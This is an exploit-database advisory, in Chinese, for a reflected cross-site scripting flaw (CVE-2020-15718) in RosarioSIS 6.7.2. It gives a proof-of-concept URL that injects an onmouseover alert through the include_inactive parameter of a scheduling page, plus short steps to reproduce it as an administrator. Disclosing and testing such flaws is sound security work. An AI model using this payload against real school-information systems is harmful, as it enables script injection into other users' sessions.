RosarioSIS 6.7.2 - 跨站脚本(XSS)
EDB-ID: 52449 CVE: 2020-15718 EDB 已验证: 是 作者: CodeSecLab 类型: webapps 平台: PHP 发布日期: 2025-12-03
漏洞信息
- 漏洞标题: RosarioSIS 6.7.2 - 跨站脚本(XSS)
- 漏洞发现日期: 2025-11-25
- 漏洞作者: CodeSecLab
- 软件供应商主页: https://gitlab.com/francoisjacquet/rosariosis
- 软件下载链接: https://gitlab.com/francoisjacquet/rosariosis
- 受影响版本: 6.7.2
- 测试环境: Windows
- CVE 编号: CVE-2020-15718
概念验证(PoC)
http://rosariosis/Modules.php?modname=Scheduling/PrintSchedules.php&search_modfunc=list&include_inactive=" onmouseover="alert(1)"
复现步骤
- 以管理员用户身份登录。
- 发送上述请求。
- 观察结果。